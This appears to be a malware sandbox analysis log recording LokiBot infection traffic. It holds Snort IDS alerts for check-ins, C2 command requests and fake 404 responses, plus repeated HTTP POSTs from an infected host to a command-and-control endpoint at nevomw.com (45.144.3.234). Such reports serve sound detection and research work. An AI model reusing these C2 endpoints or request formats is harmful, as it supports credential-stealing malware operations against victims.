                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49809
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49810
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49812
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49814
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49815
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49817
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49818
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49820
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49821
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49822
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49824
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49825
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49826
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49828
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49829
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49830
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49832
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49833
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49835
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49837
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49838
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49840
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49841 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49841 -> 45.144.3.234:80
                    Source: Joe Sandbox ViewASN Name: ASBAXETRU ASBAXETRU
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 196Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 196Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
